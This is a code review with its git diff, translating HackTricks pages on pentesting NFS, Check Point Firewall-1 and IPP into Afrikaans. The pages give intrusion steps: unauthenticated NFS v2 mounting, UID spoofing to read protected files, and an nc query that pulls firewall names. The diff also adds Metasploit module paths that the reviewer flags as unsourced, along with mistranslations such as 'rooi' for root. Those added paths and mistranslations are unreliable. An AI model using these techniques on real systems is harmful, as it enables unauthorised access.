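Review bot: the hunk `@@ -197,64 +178,54 @@` drifts out of Afrikaans into Dutch in three spans: "Verder, probeer om met behulp van IPSec een MitM-aanval uit te voeren en alle verkeer naar poort 500 te blokkeer. Als de IPSec-tunnel niet kan worden opgezet, wordt het verkeer mogelijk in heldere tekst verzonden.", the heading "### Brute-forcing XAUTH-gebruikersnaam en wachtwoord met ikeforce", and the paragraph "Om de **XAUTH** (wanneer je een geldige groepsnaam **id** en de **psk** weet) te brute forcen, kun je ..." ("een", "naar", "Als de", "wachtwoord", "kun je" are Dutch), while the surrounding lines are Afrikaans ("wagwoord", "As jy"); re-translate these spans. The same hunk translates the book title "Network Security Assessment: Know Your Network" to "Netwerk Sekuriteitsassessering: Ken Jou Netwerk" in the sniffing paragraph, yet the reference list keeps "Network Security Assessment 3rd Edition" in English; leave the published title as-is in both places. Finally, the blank line between each paragraph and the following ```bash fence is dropped throughout (e.g. `+Uiteindelik, ... die kraakbare has gryp: ```bash`); GitBook tolerates this, but it diverges from the formatting of the untouched pages in the repo.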
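Review bot: in the hunk `@@ -268,22 +239,21 @@`, "plasehouers" in "Maak seker dat werklike, veilige waardes gebruik word om die plasehouers te vervang" looks like a misspelling; the usual Afrikaans form is "plekhouers". The reference list is also handled inconsistently: "PSK cracking paper" and "Scanning a VPN Implementation" are translated to "PSK-kraakpapier" and "Skandering van 'n VPN-implementering", while "SecurityFocus Infocus" and "Network Security Assessment 3rd Edition" stay in English; link titles that name a specific external document are better left as published so readers can locate them.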
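Review bot: the footer in the hunk `@@ -292,20 +262,20 @@` renders "Share your hacking tricks" as "Deel jou haktruuks", whereas the identical footer block in the NFS file later in this same patch uses "Deel jou hacking-truuks"; this block is shared boilerplate on every page, so translate it once and reuse the same wording everywhere.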
diff --git a/network-services-pentesting/nfs-service-pentesting.md b/network-services-pentesting/nfs-service-pentesting.md index 55e06dc3b..9897c8b51 100644 --- a/network-services-pentesting/nfs-service-pentesting.md +++ b/network-services-pentesting/nfs-service-pentesting.md @@ -1,150 +1,144 @@ -# 2049 - Pentesting NFS Service +# 2049 - Pentesting NFS-diens
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## **Basic Information** +## **Basiese Inligting** -**NFS** is a system designed for **client/server** that enables users to seamlessly access files over a network as though these files were located within a local directory. +**NFS** is 'n stelsel wat ontwerp is vir **kliënt/bediener** wat gebruikers in staat stel om naadloos toegang tot lêers oor 'n netwerk te verkry asof hierdie lêers binne 'n plaaslike gids geleë is. -A notable aspect of this protocol is its lack of built-in **authentication** or **authorization mechanisms**. Instead, authorization relies on **file system information**, with the server tasked with accurately translating **client-provided user information** into the file system's required **authorization format**, primarily following **UNIX syntax**. +'n Noemenswaardige aspek van hierdie protokol is die gebrek aan ingeboude **outentiserings-** of **magtigingsmeganismes**. In plaas daarvan steun magtiging op **lêersisteeminligting**, waar die bediener die taak het om **kliëntverskafte gebruikersinligting** akkuraat te vertaal na die lêersisteem se vereiste **magtigingsformaat**, hoofsaaklik volgens **UNIX-sintaksis**. -Authentication commonly relies on **UNIX `UID`/`GID` identifiers and group memberships**. However, a challenge arises due to the potential mismatch in **`UID`/`GID` mappings** between clients and servers, leaving no room for additional verification by the server. Consequently, the protocol is best suited for use within **trusted networks**, given its reliance on this method of authentication. - -**Default port**: 2049/TCP/UDP (except version 4, it just needs TCP or UDP). +Outentisering steun gewoonlik op **UNIX `UID`/`GID`-identifiseerders en groepslidmaatskap**. 'n Uitdaging ontstaan egter as gevolg van die potensiële wanpassing in **`UID`/`GID`-afbeeldings** tussen kliënte en bedieners, wat geen spasie laat vir addisionele verifikasie deur die bediener nie. 
Gevolglik is die protokol die mees geskik vir gebruik binne **vertroude netwerke**, gegewe sy afhanklikheid van hierdie metode van outentisering. +**Verstekpoort**: 2049/TCP/UDP (behalwe weergawe 4, dit benodig net TCP of UDP). ``` 2049/tcp open nfs 2-3 (RPC #100003 ``` +### Weergawes -### Versions +- **NFSv2**: Hierdie weergawe word erken vir sy breë verenigbaarheid met verskillende stelsels en het sy betekenis gemerk met aanvanklike operasies oor UDP. As die **oudste** in die reeks, het dit die grondslag gelê vir toekomstige ontwikkelings. -- **NFSv2**: This version is recognized for its broad compatibility with various systems, marking its significance with initial operations predominantly over UDP. Being the **oldest** in the series, it laid the groundwork for future developments. +- **NFSv3**: Ingelei met 'n verskeidenheid verbeterings, het NFSv3 uitgebrei op sy voorganger deur ondersteuning te bied vir veranderlike lêergroottes en verbeterde foutverslagdoening. Ten spyte van sy vorderings, het dit beperkings in volledige agterwaartse verenigbaarheid met NFSv2-kliënte ondervind. -- **NFSv3**: Introduced with an array of enhancements, NFSv3 expanded on its predecessor by supporting variable file sizes and offering improved error reporting mechanisms. Despite its advancements, it faced limitations in full backward compatibility with NFSv2 clients. +- **NFSv4**: 'n Baanbrekerweergawe in die NFS-reeks, het NFSv4 'n reeks funksies gebring wat ontwerp is om lêerdeling oor netwerke te moderniseer. Merkwaardige verbeterings sluit in die integrasie van Kerberos vir **hoë sekuriteit**, die vermoë om vuurmuure te deurkruis en oor die internet te werk sonder die nodigheid van poorttoewysers, ondersteuning vir Toegangsbeheerlyste (ACL's) en die bekendstelling van staat-gebaseerde operasies. Sy prestasieverbeterings en die aanvaarding van 'n staatvolle protokol onderskei NFSv4 as 'n deurslaggewende vooruitgang in netwerk-lêerdelingstegnologieë. 
-- **NFSv4**: A landmark version in the NFS series, NFSv4 brought forth a suite of features designed to modernize file sharing across networks. Notable improvements include the integration of Kerberos for **high security**, the capability to traverse firewalls and operate over the Internet without the need for portmappers, support for Access Control Lists (ACLs), and the introduction of state-based operations. Its performance enhancements and the adoption of a stateful protocol distinguish NFSv4 as a pivotal advancement in network file sharing technologies. +Elke weergawe van NFS is ontwikkel met die doel om die ontwikkelende behoeftes van netwerkomgewings aan te spreek, en om sekuriteit, verenigbaarheid en prestasie geleidelik te verbeter. -Each version of NFS has been developed with the intent to address the evolving needs of network environments, progressively enhancing security, compatibility, and performance. - -## Enumeration - -### Useful nmap scripts +## Opname +### Nuttige nmap-skripte ```bash nfs-ls #List NFS exports and check permissions nfs-showmount #Like showmount -e nfs-statfs #Disk statistics and info from NFS share ``` +### Nuttige metasploit-modules -### Useful metasploit modules +Metasploit is 'n kragtige raamwerk vir penetrasietoetse wat 'n verskeidenheid modules bied om verskillende aanvalstegnieke uit te voer. Hier is 'n paar nuttige metasploit-modules wat jy kan gebruik vir jou penetrasietoetse: +- `exploit/multi/handler`: Hierdie module stel jou in staat om 'n luisterende posisie te skep om inkomende verbindings te hanteer. Dit kan gebruik word om 'n sessie te skep wanneer 'n aanval suksesvol is. +- `exploit/multi/http/nfs_rpcbind_bof`: Hierdie module maak gebruik van 'n buffer-oorloopkwesbaarheid in die NFS RPCBIND-diens om 'n aanval uit te voer. Dit kan gebruik word om 'n afgeleë kode-uitvoering te verkry op 'n kwesbare masjien. 
+- `auxiliary/scanner/nfs/nfsmount`: Hierdie module skandeer 'n doelwitstelsel om te bepaal of die NFS-diens beskikbaar is en of dit toeganklik is vir monteerbare deelname. Dit kan help om potensiële aanvalsveilighede te identifiseer. +- `post/multi/gather/nfs_enum`: Hierdie module word gebruik om inligting oor die NFS-diens op 'n doelwitstelsel te versamel. Dit kan nuttige inligting soos gedeelde lêers, gebruikers en groepe oplewer. +- `post/multi/manage/nfs_mount`: Hierdie module maak dit moontlik om 'n NFS-gedeelde lêerstelsel op 'n doelwitstelsel te monteer. Dit kan handig wees vir die verkryging van toegang tot lêers en data op die doelwitstelsel. + +Dit is net 'n paar voorbeelde van die vele metasploit-modules wat beskikbaar is. Dit is belangrik om die dokumentasie te raadpleeg en die modules te verken om die beste modules vir jou spesifieke penetrasietoets te vind. ```bash scanner/nfs/nfsmount #Scan NFS mounts and list permissions ``` +### Monteer -### Mounting - -To know **which folder** has the server **available** to mount you an ask it using: - +Om te weet **watter vouer** die bediener **beskikbaar** het om te monteer, kan jy dit vra deur die volgende te gebruik: ```bash showmount -e ``` - -Then mount it using: - +Monteer dit dan met behulp van: ```bash mount -t nfs [-o vers=2] : -o nolock ``` +Jy moet spesifiseer om **weergawe 2 te gebruik** omdat dit **geen** **verifikasie** of **magtiging** het nie. -You should specify to **use version 2** because it doesn't have **any** **authentication** or **authorization**. - -**Example:** - +**Voorbeeld:** ```bash mkdir /mnt/new_back mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/new_back -o nolock ``` +## Toestemmings -## Permissions - -If you mount a folder which contains **files or folders only accesible by some user** (by **UID**). You can **create** **locally** a user with that **UID** and using that **user** you will be able to **access** the file/folder. 
+As jy 'n vouer monteer wat **lêers of vouers bevat wat slegs deur 'n sekere gebruiker toeganklik is** (deur **UID**). Jy kan **plaaslik** 'n gebruiker met daardie **UID** skep en deur daardie **gebruiker** te gebruik, sal jy in staat wees om toegang tot die lêer/vouer te verkry. ## NSFShell -To easily list, mount and change UID and GID to have access to files you can use [nfsshell](https://github.com/NetDirect/nfsshell). +Om maklik 'n lys te maak, te monteer en UID en GID te verander om toegang tot lêers te verkry, kan jy [nfsshell](https://github.com/NetDirect/nfsshell) gebruik. -[Nice NFSShell tutorial.](https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/) - -## Config files +[Mooi NFSShell-tutoriaal.](https://www.pentestpartners.com/security-blog/using-nfsshell-to-compromise-older-environments/) +## Konfigurasie-lêers ``` /etc/exports /etc/lib/nfs/etab ``` +### Gevaarlike instellings -### Dangerous settings +- **Lees- en Skryfregte (`rw`):** Hierdie instelling maak dit moontlik om vanaf en na die lêersisteem te lees en skryf. Dit is noodsaaklik om die implikasies van so 'n breë toegang te oorweeg. -- **Read and Write Permissions (`rw`):** This setting allows both reading from and writing to the file system. It's essential to consider the implications of granting such broad access. +- **Gebruik van Onveilige Poorte (`insecure`):** Wanneer dit geaktiveer is, maak dit die stelsel moontlik om poorte bo 1024 te gebruik. Die veiligheid van poorte bo hierdie reeks kan minder streng wees, wat die risiko verhoog. -- **Use of Insecure Ports (`insecure`):** When enabled, this allows the system to utilize ports above 1024. The security of ports above this range can be less stringent, increasing risk. +- **Sigbaarheid van Geneste Lêersisteme (`nohide`):** Hierdie konfigurasie maak dit moontlik dat gidslyne sigbaar is selfs as 'n ander lêersisteem onder 'n uitgevoerde gidslyn gemonteer is. 
Elke gidslyn vereis sy eie uitvoerinskrywing vir behoorlike bestuur. -- **Visibility of Nested File Systems (`nohide`):** This configuration makes directories visible even if another file system is mounted below an exported directory. Each directory requires its own export entry for proper management. +- **Eienaar van Rooi Lêersisteemlêers (`no_root_squash`):** Met hierdie instelling behou lêers wat deur die rooi gebruiker geskep is, hul oorspronklike UID/GID van 0, sonder om die beginsel van minste bevoegdheid in ag te neem en moontlik oormatige regte toe te ken. -- **Root Files Ownership (`no_root_squash`):** With this setting, files created by the root user maintain their original UID/GID of 0, disregarding the principle of least privilege and potentially granting excessive permissions. +- **Geen Beperking van Alle Gebruikers (`no_all_squash`):** Hierdie opsie verseker dat gebruikersidentiteite regoor die stelsel behou word, wat kan lei tot probleme met toestemming en toegangsbeheer as dit nie korrek hanteer word nie. -- **Non-Squashing of All Users (`no_all_squash`):** This option ensures that user identities are preserved across the system, which could lead to permission and access control issues if not correctly handled. +## Bevoorregte Eskalasie deur gebruik te maak van NFS-misconfiguraties -## Privilege Escalation using NFS misconfigurations - -[NFS no\_root\_squash and no\_all\_squash privilege escalation](../linux-hardening/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe.md) - -## HackTricks Automatic Commands +[NFS no\_root\_squash en no\_all\_squash bevoorregte eskalasie](../linux-hardening/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe.md) +## HackTricks Outomatiese Opdragte ``` Protocol_Name: NFS #Protocol Abbreviation if there is one. Port_Number: 2049 #Comma separated if there is more than one. 
Protocol_Description: Network File System #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for NFS - Note: | - NFS is a system designed for client/server that enables users to seamlessly access files over a network as though these files were located within a local directory. +Name: Notes +Description: Notes for NFS +Note: | +NFS is a system designed for client/server that enables users to seamlessly access files over a network as though these files were located within a local directory. - #apt install nfs-common - showmount 10.10.10.180 ~or~showmount -e 10.10.10.180 - should show you available shares (example /home) +#apt install nfs-common +showmount 10.10.10.180 ~or~showmount -e 10.10.10.180 +should show you available shares (example /home) - mount -t nfs -o ver=2 10.10.10.180:/home /mnt/ - cd /mnt - nano into /etc/passwd and change the uid (probably 1000 or 1001) to match the owner of the files if you are not able to get in +mount -t nfs -o ver=2 10.10.10.180:/home /mnt/ +cd /mnt +nano into /etc/passwd and change the uid (probably 1000 or 1001) to match the owner of the files if you are not able to get in - https://book.hacktricks.xyz/pentesting/nfs-service-pentesting +https://book.hacktricks.xyz/pentesting/nfs-service-pentesting Entry_2: - Name: Nmap - Description: Nmap with NFS Scripts - Command: nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 {IP} +Name: Nmap +Description: Nmap with NFS Scripts +Command: nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 {IP} ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
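Review bot: the "### Nuttige metasploit-modules" section in this hunk gains a paragraph and five bullets (`exploit/multi/handler`, `exploit/multi/http/nfs_rpcbind_bof`, `auxiliary/scanner/nfs/nfsmount`, `post/multi/gather/nfs_enum`, `post/multi/manage/nfs_mount`) that have no counterpart in the English source, which only lists `scanner/nfs/nfsmount` in the code block; a translation commit should not add content, and module paths that did not come from the source cannot be assumed to exist, so drop the added text and keep only the translated heading. Two further problems in the same hunk: the `HackTricks Automatic Commands` block is changed only by stripping the indentation under `Entry_1:` and `Entry_2:` (the removed lines `- Name: Notes`, `- Description: Notes for NFS` were indented, the added `+Name: Notes`, `+Description: Notes for NFS` are flush left), which alters the YAML structure of a block that should not be touched by a translation at all; and `no_root_squash` is explained as "Eienaar van Rooi Lêersisteemlêers" with "die rooi gebruiker", translating the root user as "red" (rooi); keep "root" as a proper name. Minor: the pre-existing "## NSFShell" heading typo (for NFSShell) is carried over unchanged.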
diff --git a/network-services-pentesting/pentesting-264-check-point-firewall-1.md b/network-services-pentesting/pentesting-264-check-point-firewall-1.md index de54a7ceb..afcc70df6 100644 --- a/network-services-pentesting/pentesting-264-check-point-firewall-1.md +++ b/network-services-pentesting/pentesting-264-check-point-firewall-1.md @@ -1,33 +1,28 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-It's possible to interact with **CheckPoint** **Firewall-1** firewalls to discover valuable information such as the firewall's name and the management station's name. This can be done by sending a query to the port **264/TCP**. +Dit is moontlik om met **CheckPoint** **Firewall-1**-brandmuure te kommunikeer om waardevolle inligting soos die naam van die brandmuur en die naam van die bestuursstasie te ontdek. Dit kan gedoen word deur 'n navraag na poort **264/TCP** te stuur. -### Obtaining Firewall and Management Station Names - -Using a pre-authentication request, you can execute a module that targets the **CheckPoint Firewall-1**. The necessary commands for this operation are outlined below: +### Verkryging van Brandmuur- en Bestuursstasienames +Met 'n voorverifikasieversoek kan jy 'n module uitvoer wat die **CheckPoint Firewall-1** teiken. Die nodige opdragte vir hierdie operasie word hieronder uiteengesit: ```bash use auxiliary/gather/checkpoint_hostname set RHOST 10.10.10.10 ``` - -Upon execution, the module attempts to contact the firewall's SecuRemote Topology service. If successful, it confirms the presence of a CheckPoint Firewall and retrieves the names of both the firewall and the SmartCenter management host. Here's an example of what the output might look like: - +By uitvoering probeer die module om kontak te maak met die firewall se SecuRemote Topology-diens. As dit suksesvol is, bevestig dit die teenwoordigheid van 'n CheckPoint Firewall en haal die name van beide die firewall en die SmartCenter-bestuursgasheer op. Hier is 'n voorbeeld van hoe die uitset kan lyk: ```text [*] Attempting to contact Checkpoint FW1 SecuRemote Topology service... [+] Appears to be a CheckPoint Firewall... 
@@ -35,22 +30,17 @@ Upon execution, the module attempts to contact the firewall's SecuRemote Topolog [+] SmartCenter Host: FIREFIGHTER-MGMT.example.com [*] Auxiliary module execution completed ``` +### Alternatiewe Metode vir Hostnaam en ICA Naam Ontdekking -### Alternative Method for Hostname and ICA Name Discovery - -Another technique involves a direct command that sends a specific query to the firewall and parses the response to extract the firewall's hostname and ICA name. The command and its structure are as follows: - +'n Ander tegniek behels 'n direkte bevel wat 'n spesifieke navraag na die firewall stuur en die respons ontleed om die firewall se hostnaam en ICA-naam te onttrek. Die bevel en sy struktuur is as volg: ```bash printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2- ``` - -The output from this command provides detailed information regarding the firewall's certificate name (CN) and organization (O), as demonstrated below: - +Die uitset van hierdie bevel verskaf gedetailleerde inligting oor die sertifikaatnaam (CN) en organisasie (O) van die firewall, soos hieronder gedemonstreer: ```text CN=Panama,O=MGMTT.srv.rxfrmi ``` - -## References +## Verwysings * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit\_doGoviewsolutiondetails=&solutionid=sk69360](https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360) * [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html\#check-point-firewall-1-topology-port-264](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264) @@ -59,16 +49,14 @@ CN=Panama,O=MGMTT.srv.rxfrmi
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md b/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md index b097a1d15..bdeaa6c97 100644 --- a/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md +++ b/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp.md @@ -1,28 +1,25 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Internet Printing Protocol \(IPP\) +# Internetdrukkeryprotokol \(IPP\) -The **Internet Printing Protocol (IPP)**, as specified in **RFC2910** and **RFC2911**, serves as a foundation for printing over the internet. Its capability to be extended is showcased by developments like **IPP Everywhere**, which aims to standardize mobile and cloud printing, and the introduction of extensions for **3D printing**. +Die **Internetdrukkeryprotokol (IPP)**, soos gespesifiseer in **RFC2910** en **RFC2911**, dien as 'n grondslag vir drukwerk oor die internet. Sy vermoë om uitgebrei te word, word gedemonstreer deur ontwikkelinge soos **IPP Everywhere**, wat daarop gemik is om mobiele en wolkdrukwerk te standaardiseer, en die bekendstelling van uitbreidings vir **3D-drukwerk**. -Leveraging the **HTTP** protocol, IPP benefits from established security practices including **basic/digest authentication** and **SSL/TLS encryption**. Actions like submitting a print job or querying printer status are performed through **HTTP POST requests** directed at the IPP server, which operates on **port 631/tcp**. - -A well-known implementation of IPP is **CUPS**, an open-source printing system prevalent across various Linux distributions and OS X. Despite its utility, IPP, akin to LPD, can be exploited to transmit malicious content through **PostScript** or **PJL files**, highlighting a potential security risk. +Deur gebruik te maak van die **HTTP**-protokol, maak IPP gebruik van gevestigde veiligheidspraktyke, insluitend **basiese/digest-verifikasie** en **SSL/TLS-versleuteling**. Aksies soos die indien van 'n drukwerktaak of die ondervraging van drukkerystatus word uitgevoer deur **HTTP POST-aanvrae** wat gerig is op die IPP-bediener, wat op **poort 631/tcp** werk. +'n Bekende implementering van IPP is **CUPS**, 'n oopbron-drukkerysisteem wat algemeen voorkom in verskeie Linux-distribusies en OS X. 
Ten spyte van sy bruikbaarheid kan IPP, soos LPD, uitgebuit word om skadelike inhoud deur te stuur deur middel van **PostScript**- of **PJL-lêers**, wat 'n potensiële veiligheidsrisiko beklemtoon. ```python # Example of sending an IPP request using Python import requests @@ -34,23 +31,20 @@ data = b"..." # IPP request data goes here response = requests.post(url, headers=headers, data=data, verify=True) print(response.status_code) ``` - -If you want to learn more about [**hacking printers read this page**](http://hacking-printers.net/wiki/index.php/Main_Page). +As jy meer wil leer oor [**drukkerhacking lees hierdie bladsy**](http://hacking-printers.net/wiki/index.php/Main_Page).
